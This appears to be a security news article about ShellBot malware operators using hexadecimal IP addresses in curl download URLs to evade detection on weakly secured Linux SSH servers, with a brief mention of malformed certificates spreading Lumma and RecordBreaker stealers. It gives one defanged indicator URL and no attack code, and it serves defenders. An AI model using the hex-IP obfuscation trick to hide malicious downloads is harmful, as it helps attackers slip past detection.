HQ/EMEAFind out how we can help your business
The ShellBot malware operators have recently employed hexadecimal representations of their IP addresses to avoid detection in its attacks on poorly configured Linux SSH servers.
Moreover, this malicious group responsible for ShellBot utilised these hexadecimal IPs to breach vulnerable Linux SSH servers and launch a distributed denial-of-service malware. Based on reports, the standard operation of ShellBot remains unaffected by the changes. However, there have been alterations in the download URL used by the threat actor to install ShellBot. Instead of a regular IP address, they use a hexadecimal value.
ShellBot, also known as PerlBot, is a notorious threat group famous for breaching servers with weak SSH credentials by executing brute-force or dictionary attacks. Once it obtains initial access, the botnet becomes a vector for launching DDoS attacks and delivering cryptocurrency miners. Additionally, the malware developers based the botnet in Perl, which could use the IRC protocol to communicate with a command-and-control (C2) server.
The new ShellBot malware campaigns include hexadecimal IP addresses.
According to investigations, the newly discovered ShellBot malware attacks involve the installation of the malware via hexadecimal IP addresses, such as “hxxp://0x2763da4e/,” which corresponds to “39.99.218[.]78.”
Researchers believe this change is the malware operators’ attempt to bypass detection signatures based on URL patterns. In addition, the researchers emphasised that the threat actors use “curl” for downloading, which supports hexadecimal-like web browsers. This technique allowed ShellBot to infiltrate Linux systems and run via Perl successfully.
This discovery about the ShellBot operation shows that its developers continue actively employing it to launch attacks against Linux systems. Hence, users should enhance their server security by implementing solid passwords and constantly changing them to prevent brute-force and dictionary attacks.
Furthermore, there is another threat where attackers utilise abnormal certificates with exceptionally long strings in the Subject Name and Issuer Name fields. The attackers used the tactic to distribute information-stealing malware like Lumma Stealer and a variant of RedLine Stealer known as RecordBreaker.
These malicious pages are easily accessible through search engines, typically employing keywords related to illegal programs such as serials, keygens, and cracks, which pose a significant threat to many users. Users should also be wary of these techniques and be careful when downloading products from unverified websites.
